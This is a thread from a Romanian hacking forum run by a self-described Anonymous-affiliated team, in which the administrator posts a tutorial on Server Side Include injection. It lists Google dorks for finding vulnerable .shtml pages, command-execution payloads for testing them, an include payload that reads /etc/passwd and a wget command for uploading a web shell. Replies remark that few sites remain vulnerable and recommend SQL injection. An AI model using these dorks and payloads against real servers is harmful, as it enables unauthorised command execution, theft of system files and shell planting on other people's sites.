Filehost.ro - gazduire fisiere
Ne-am mutat pe xhackers.4umer.com
Ne-am mutat pe xhackers.4umer.com
Nou pe simpatie:
Lolo
Femeie
24 ani
Galati
cauta Barbat
25 - 52 ani
Ne-am mutat pe xhackers.4umer.comReguliInregistrareLoginPozeNu sunteti logat. Lista Forumurilor Pe Tematici
Ne-am mutat pe xhackers.4umer.com / Tutoriale /

SSI Tutorial

Pagini: 1 Moderat de Bloody
#1
ß®£αK£®™
Administrator
Postari: 311
Un atac de tip SSI (Server Side Include) face comenzi direct pe server-ul sit-ului , pentru asta trebuie sa aveti cunostinte de baza de Batch (pentru windows) sau Bash (pentru Linux)

Pentru a fi un site vulnerabil , sit-ul trebuie sa aiba extensie xshtml / shtm sau stm pe apache sau trebuie sa aiba in file config de apache un server side includes , uite cateva doork pentru google:
inurl:index.shtml
inurl:index.shtm
inurl:index.stm

Acum trebuie sa verificam , trebuie sa trimitem o comanda in unu din spatiile astea:
< !–#exec cmd=”ls” –>
< !–#exec cmd=”dir” –>

Daca dupa ce verificati , ca Output este un file de sistem, inseamna ca server-ul este vulnerabil, acum va arat cateva exemple de coduri care puteti sa scrieti:
Cititi /etc/passwd: <!--–#include virtual=”/etc/passwd” –-->
Uploadeaza un shell : < !–#exec cmd=”wget “shell_3.php”" –>


_______________________________________
We are Anonymous!
We are legion!
Wait for us!
We X-HackersTeam!
We have the power!
We want respect!
X-HackersTeam is Anonymous
EXPECT US !



 
   
#2
K3nnT
Membru
Postari: 15
foarte putine mai sunt vulnerabile

SSI Tutorial - foarte putine mai sunt vulnerabile - Tutoriale
SSI Tutorial – poza de K3nnT, in Tutoriale · 20.2KB


 
   
#3
ß®£αK£®™
Administrator
Postari: 311
Stiu....
Eu va recomand SQL


_______________________________________
We are Anonymous!
We are legion!
Wait for us!
We X-HackersTeam!
We have the power!
We want respect!
X-HackersTeam is Anonymous
EXPECT US !



 
   
Pagini: 1  
Mergi la